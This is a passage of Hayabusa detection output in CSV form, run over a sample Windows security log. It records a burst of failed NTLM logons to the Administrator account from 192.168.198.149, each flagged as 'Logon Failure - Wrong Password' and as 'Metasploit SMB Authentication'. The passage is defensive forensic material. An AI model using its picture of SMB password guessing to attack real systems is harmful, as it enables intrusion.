Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fd61fJBRizl2AIGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDIFX7lsmGqSGvkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVmto6S25gU2bkwa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7QMbzSuGuzzMK0v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJUynF5bN1Oj0vaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dg4ZtybY5BnPN0nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gRmRV9ct3hor8Muk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QRjaP1mj9FgKsGBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CCzzatQ195mcxQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJPIrtk5GBAhsUlR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 720RHwyXQcxvsJBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GofmHRstuhljMDOL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wQUQ4INktwXwRkaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WHs5hduf7SmUcLK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gdo1txjJXiRLbUDH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JK8jP3ftKQOyutGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdbEjo88dBJRhrKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZCVkXkwhbuSM654 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z2mc9WScfBa88rtO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lee7qYLkXQoz8rRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g1ZKpZuZU1WRoC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4ST7RrHJxAQHHbn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GtW1hBHF97YqvN4N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVKlPytPofO9LQBm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GOkZ9yjvfL51UYXo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAxfxSbRqGO7Dej0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D7XmvDYk6zFLir09 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mWcl6CKdSMxd8edZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SxBQlFZvGBqDdobn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXN94VanwME6q8rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOj7CZ3stJXePY8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXjmqxguFGL3f8cV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHWmdxnRrMbxrdlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ROBnjuyHn4FRugk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zGxuUxasL680O21l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYoM984EzAkUtBoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0e3ATNpzeeAf6Qax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1A0dGhpVy8kgiRP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGgNAKJM5RAt9B5K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c3DpedXujvQpZnjQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BsaSjESaUHbsIxJL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ca4dlxyEco3VOapw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6lJc7DXAOcNZ2G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Olt5mS7na07VDJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCFeQcUMDTs0ev8v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYmH6CQrizoZ1DAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iYtujXkzySwZQFk8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 